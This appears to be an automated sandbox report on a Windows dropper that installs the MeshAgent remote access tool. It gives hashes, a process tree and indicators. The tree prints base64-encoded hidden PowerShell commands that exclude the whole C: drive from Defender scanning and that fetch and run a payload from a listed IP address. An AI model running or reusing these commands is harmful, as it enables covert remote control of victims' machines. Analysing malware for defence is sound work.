Analysis

  • max time kernel
    100s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2024 11:28

General

  • Target

    file.exe

  • Size

    62.7MB

  • MD5

    2ffafb44b3efdc58f229ffbce7b12796

  • SHA1

    3ce9d89c6af5059f455de63a7cf13e6bad4733a0

  • SHA256

    e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f

  • SHA512

    d9ec7de46f28764d36cf7d33413b49de92d532547333876394a93771aaf87e983f64e69afd26d89f9db3b3158df1c0b163b7ea6731d923ece0c7f4bb2f130963

  • SSDEEP

    1572864:u8OZCu66ERkqhn7gcc2qV3TdRdmJRHAUmi24Wrt0:mZCu90UFTdwRHjT2Xt0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://46.8.227.16/uploads/meshagent32-mesh.png

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 36 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 64 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 29 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4512
    • C:\Users\Admin\AppData\Local\Temp\Install(4).exe
      "C:\Users\Admin\AppData\Local\Temp\Install(4).exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2676
      • C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
        "C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1200
          • C:\Windows\SysWOW64\chcp.com
            C:\Windows\System32\chcp.com 65001
            5⤵
              PID:4112
            • C:\Windows\system32\reg.exe
              C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
              5⤵
                PID:2836
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4460
              • C:\Windows\SysWOW64\chcp.com
                C:\Windows\System32\chcp.com 866
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4736
              • C:\Windows\SysWOW64\wbem\WMIC.exe
                C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2428
              • C:\Windows\SysWOW64\more.com
                C:\Windows\System32\more.com
                5⤵
                  PID:3564
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:440
                • C:\Windows\SysWOW64\chcp.com
                  C:\Windows\System32\chcp.com 866
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:216
                • C:\Windows\SysWOW64\wbem\WMIC.exe
                  C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
                  5⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4564
                • C:\Windows\SysWOW64\more.com
                  C:\Windows\System32\more.com
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1804
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1412
                • C:\Windows\SysWOW64\chcp.com
                  C:\Windows\System32\chcp.com 866
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2372
                • C:\Windows\SysWOW64\wbem\WMIC.exe
                  C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1604
                • C:\Windows\SysWOW64\more.com
                  C:\Windows\System32\more.com
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3472
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1372
                • C:\Windows\SysWOW64\chcp.com
                  C:\Windows\System32\chcp.com 65001
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1492
                • C:\Windows\system32\reg.exe
                  C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
                  5⤵
                    PID:4696
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3616
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICJodHRwOi8vNDYuOC4yMjcuMTYvdXBsb2Fkcy9tZXNoYWdlbnQzMi1tZXNoLnBuZyIKCiRvdXRwdXQgPSAiJGVudjpURU1QXG1lc2hhZ2VudDMyLW1lc2guZXhlIgoKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdXJsIC1PdXRGaWxlICRvdXRwdXQKCmlmIChUZXN0LVBhdGggJG91dHB1dCkgewogICAgdHJ5IHsKICAgICAgICAkcHJvY2Vzc1N0YXJ0ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbwogICAgICAgICRwcm9jZXNzU3RhcnQuRmlsZU5hbWUgPSAkb3V0cHV0CiAgICAgICAgJHByb2Nlc3NTdGFydC5Bcmd1bWVudHMgPSAiLWZ1bGxpbnN0YWxsIgogICAgICAgICRwcm9jZXNzU3RhcnQuV2luZG93U3R5bGUgPSBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NXaW5kb3dTdHlsZV06OkhpZGRlbgogICAgICAgIFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OlN0YXJ0KCRwcm9jZXNzU3RhcnQpCiAgICB9CiAgICBjYXRjaCB7CiAgICB9Cn0KZWxzZSB7CiAKfQ==')); Invoke-Expression $script}"
                  4⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4816
                  • C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
                    "C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe" -fullinstall
                    5⤵
                    • Sets service image path in registry
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • System Location Discovery: System Language Discovery
                    PID:2368
                • C:\Users\Admin\AppData\Local\Temp\6b79f2f612de1a4bc918fb1afef4d466
                  C:\Users\Admin\AppData\Local\Temp\6b79f2f612de1a4bc918fb1afef4d466
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  PID:4816
                  • C:\Users\Admin\AppData\Local\Temp\6b79f2f612de1a4bc918fb1afef4d466
                    "C:\Users\Admin\AppData\Local\Temp\6b79f2f612de1a4bc918fb1afef4d466"
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of SetWindowsHookEx
                    PID:980
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 1292
                      6⤵
                      • Program crash
                      PID:1172
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 1304
                      6⤵
                      • Program crash
                      PID:4796
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 1340
                      6⤵
                      • Program crash
                      PID:2840
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2812
            • C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
              "C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3084
              • C:\Users\Admin\AppData\Local\Temp\is-OM29M.tmp\pdfFiller.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-OM29M.tmp\pdfFiller.tmp" /SL5="$80066,6038703,916992,C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"
                3⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:4864
                • C:\Program Files (x86)\pdfFiller\pdfFiller.exe
                  "C:\Program Files (x86)\pdfFiller\pdfFiller.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  PID:1260
          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
            1⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            PID:2364
            • C:\Windows\SysWOW64\wbem\wmic.exe
              wmic SystemEnclosure get ChassisTypes
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3980
            • C:\Windows\SysWOW64\wbem\wmic.exe
              wmic os get oslanguage /FORMAT:LIST
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1796
            • C:\Windows\SysWOW64\wbem\wmic.exe
              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
              2⤵
                PID:2808
              • C:\Windows\SysWOW64\wbem\wmic.exe
                wmic os get oslanguage /FORMAT:LIST
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1820
              • C:\Windows\SysWOW64\wbem\wmic.exe
                wmic SystemEnclosure get ChassisTypes
                2⤵
                  PID:1012
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1924
              • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                1⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                PID:4060
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic SystemEnclosure get ChassisTypes
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2856
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic os get oslanguage /FORMAT:LIST
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4132
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3420
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic SystemEnclosure get ChassisTypes
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2868
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3220
              • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                1⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                PID:1512
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic SystemEnclosure get ChassisTypes
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3280
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic os get oslanguage /FORMAT:LIST
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4244
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4796
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic SystemEnclosure get ChassisTypes
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:5116
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3212
              • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                1⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                PID:1776
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic SystemEnclosure get ChassisTypes
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2812
                • C:\Windows\SysWOW64\wbem\wmic.exe
                  wmic os get oslanguage /FORMAT:LIST
                  2⤵
                    PID:2376
                  • C:\Windows\SysWOW64\wbem\wmic.exe
                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                    2⤵
                      PID:4500
                    • C:\Windows\SysWOW64\wbem\wmic.exe
                      wmic SystemEnclosure get ChassisTypes
                      2⤵
                        PID:836
                      • C:\Windows\SysWOW64\wbem\wmic.exe
                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:684
                    • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                      "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                      1⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Modifies data under HKEY_USERS
                      PID:1836
                      • C:\Windows\SysWOW64\wbem\wmic.exe
                        wmic SystemEnclosure get ChassisTypes
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1552
                      • C:\Windows\SysWOW64\wbem\wmic.exe
                        wmic os get oslanguage /FORMAT:LIST
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1796
                      • C:\Windows\SysWOW64\wbem\wmic.exe
                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1152
                      • C:\Windows\SysWOW64\wbem\wmic.exe
                        wmic SystemEnclosure get ChassisTypes
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2172
                      • C:\Windows\SysWOW64\wbem\wmic.exe
                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4956
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 980 -ip 980
                      1⤵
                        PID:916
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 980 -ip 980
                        1⤵
                          PID:4596
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 980 -ip 980
                          1⤵
                            PID:3296
                          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                            1⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            PID:1368
                            • C:\Windows\SysWOW64\wbem\wmic.exe
                              wmic SystemEnclosure get ChassisTypes
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:3616
                            • C:\Windows\SysWOW64\wbem\wmic.exe
                              wmic os get oslanguage /FORMAT:LIST
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2872
                            • C:\Windows\SysWOW64\wbem\wmic.exe
                              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2608
                            • C:\Windows\SysWOW64\wbem\wmic.exe
                              wmic os get oslanguage /FORMAT:LIST
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:3336
                            • C:\Windows\SysWOW64\wbem\wmic.exe
                              wmic SystemEnclosure get ChassisTypes
                              2⤵
                                PID:4404
                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:408
                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                              "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                              1⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Drops file in Program Files directory
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:1320
                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                wmic SystemEnclosure get ChassisTypes
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1784
                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                wmic os get oslanguage /FORMAT:LIST
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1208
                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                2⤵
                                  PID:4952
                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                  wmic os get oslanguage /FORMAT:LIST
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4320
                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                  wmic SystemEnclosure get ChassisTypes
                                  2⤵
                                    PID:3052
                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4612
                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                  "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • System Location Discovery: System Language Discovery
                                  • Modifies data under HKEY_USERS
                                  PID:3708
                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                    wmic SystemEnclosure get ChassisTypes
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2836
                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                    wmic os get oslanguage /FORMAT:LIST
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:968
                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3572

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.db

                                  Filesize

                                  385KB

                                  MD5

                                  1d3ff888ed80941323bd388bd04de60e

                                  SHA1

                                  12ecc7558540abebc75e3499c1dcf36ec34aff9d

                                  SHA256

                                  76436fd7a0eccc6cdade1c8d872a28bdbc8580321b121d7ffb06217c70e2eb43

                                  SHA512

                                  195cee4b44ebe1e6d3338347f529e612b3510a06f7725145d20e4703af2d7915b2279e2ba311cb0ec66459783a5b6ea8cfe7b460187893de73fa0c0a92173f3a

                                • C:\Program Files (x86)\pdfFiller\pdfFiller.exe

                                  Filesize

                                  3.0MB

                                  MD5

                                  46d083e25c4d49f928d3b025ba1e00f6

                                  SHA1

                                  02e7f5c91749bd65290e01c5ee0fba151e8e3682

                                  SHA256

                                  ccb88594f2495e896c6b3c01cc1dd5838779cea06687d41ae64037471d551c2f

                                  SHA512

                                  88416aad10975f25d471f63e908be09b50752a6806a8b8ac28ba096cf1b78aa179a975ac0519582667ed8e9b7a92d290dc9c20a50a6fbbc2f00397aaeb8e445d

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1zy51jy.lab.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\is-OM29M.tmp\pdfFiller.tmp

                                  Filesize

                                  3.2MB

                                  MD5

                                  4d249e135d4ae493ac8a946aa242d48a

                                  SHA1

                                  3ff02b2857f71f81854a6ee6ae2639f18b0ea8aa

                                  SHA256

                                  ad713590abb05f828e36b91ff0c1b1d44cbb61c3b5d40455791f2a7df5763261

                                  SHA512

                                  4031cbb905d9ac0e7f48c4e75171aa7e4df5efad7cd62295faf319aaacbd27baf0afe14a828bf98661164ac01be5589493ede3a82293890756a65bebfe50d089

                                • C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe

                                  Filesize

                                  3.7MB

                                  MD5

                                  546157d9f4974c5b9871be88d6814a3e

                                  SHA1

                                  8fa936396bca1454aa4bb8f8767394ca25763383

                                  SHA256

                                  c9fb879ceee5d354d2f773a565f7a537cb71733ea79dce8763a819774c64304c

                                  SHA512

                                  8369d845ecd5670abc2d257e9a794bf59c771f1496b8ae6a74d0987c25152483cf0ca15710bbf087c6aa816700b6a8774e4dd7744b91256e2f54094b65271117

                                • C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe

                                  Filesize

                                  6.7MB

                                  MD5

                                  08722dbbead04e11a0612321f27a375e

                                  SHA1

                                  57edfccdce2937bc6df301b6c5a2e5a97e0ec6c2

                                  SHA256

                                  00e9198b63906a8668f114401b18c95236562a3af9228ad35430f1fab8a884a0

                                  SHA512

                                  ce4888eba51baf13e09b5a0f506be28bfabff4a84831db25993673e30dcf342f54801a1bf8c8bc5898487da91d4b606e5cc8deea2574ed49ce78bf7ab94b0516

                                • C:\Users\Admin\AppData\Local\pdfFiller\pdfFiller.exe_Url_i1z3rwcod0vxpymez4420j0vzwmjgxdq\1.0.0.0\rgas2g3h.newcfg

                                  Filesize

                                  451B

                                  MD5

                                  87ffbcaa0eb520a257d5ac0c286675f4

                                  SHA1

                                  b2aa8296d7da3337992e247ceeaae1e307b3e713

                                  SHA256

                                  d770d384f890a45efb6179fd33ac101ee060cb98fccd1231244d47496544750c

                                  SHA512

                                  cba20b9c0eedcb5ecc8ac11f198d7592902514cfed5c48aa62d098dbc2e20d5b5f45a74111c953acf9d123fa40b133774e02f9aa1018d716aa3bbcec0bc6077a

                                • C:\Users\Admin\AppData\Local\pdfFiller\pdfFiller.exe_Url_i1z3rwcod0vxpymez4420j0vzwmjgxdq\1.0.0.0\user.config

                                  Filesize

                                  321B

                                  MD5

                                  9e47641b957d0d1a102c9bec8abf4bdb

                                  SHA1

                                  31ed884579caf76fb7176c46b8d40a5a889e9651

                                  SHA256

                                  9c093726299239549246c730d16222814ee42463bc6018601c0bf5ef31cf7989

                                  SHA512

                                  6a5012100ce5f28799c221c1c91c79830415ec22b374e6d3614c14bce1c9987442e9abb5a2186c5fe6595ec97ddb5a26c290c12fb5c6043830b18794dbb6ea4e

                                • C:\Users\Admin\AppData\Roaming\Installer\jre\bin\awt.dll

                                  Filesize

                                  1.1MB

                                  MD5

                                  159ccf1200c422ced5407fed35f7e37d

                                  SHA1

                                  177a216b71c9902e254c0a9908fcb46e8d5801a9

                                  SHA256

                                  30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49

                                  SHA512

                                  ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365

                                • C:\Users\Admin\AppData\Roaming\Installer\jre\bin\client\jvm.dll

                                  Filesize

                                  3.7MB

                                  MD5

                                  39c302fe0781e5af6d007e55f509606a

                                  SHA1

                                  23690a52e8c6578de6a7980bb78aae69d0f31780

                                  SHA256

                                  b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc

                                  SHA512

                                  67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

                                • C:\Users\Admin\AppData\Roaming\Installer\jre\bin\glass.dll

                                  Filesize

                                  196KB

                                  MD5

                                  434cbb561d7f326bbeffa2271ecc1446

                                  SHA1

                                  3d9639f6da2bc8ac5a536c150474b659d0177207

                                  SHA256

                                  1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143

                                  SHA512

                                  9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc

                                • C:\Users\Admin\AppData\Roaming\Installer\jre\bin\java.dll

                                  Filesize

                                  123KB

                                  MD5

                                  73bd0b62b158c5a8d0ce92064600620d

                                  SHA1

                                  63c74250c17f75fe6356b649c484ad5936c3e871

                                  SHA256

